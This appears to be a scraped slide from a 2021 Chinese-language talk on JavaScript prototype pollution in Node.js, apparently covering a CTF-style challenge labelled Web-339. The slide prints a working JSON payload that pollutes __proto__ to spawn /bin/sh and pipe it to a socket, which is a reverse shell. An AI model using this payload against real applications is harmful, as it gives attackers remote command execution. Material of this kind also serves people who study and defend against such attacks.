More Related Content
Similar to 2021 Node.js & JavaScript 原型鏈污染
Similar to 2021 Node.js & JavaScript 原型鏈污染 (20)
2021 Node.js & JavaScript 原型鏈污染
- 8. 6/21/21 7
Web-339
Payload:
{"__proto__": {"query": "return (function(){
var net = global.process.mainModule.constructor._load('net’),
cp = global.process.mainModule.constructor._load('child_process’),
sh = cp.spawn('/bin/sh', []);
var client = new net.Socket();
client.connect(1337, '127.0.0.1’,
function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
return /a/;})();"}}
https://github.com/Stakcery/Web-Security.git
process.mainModule 等同 require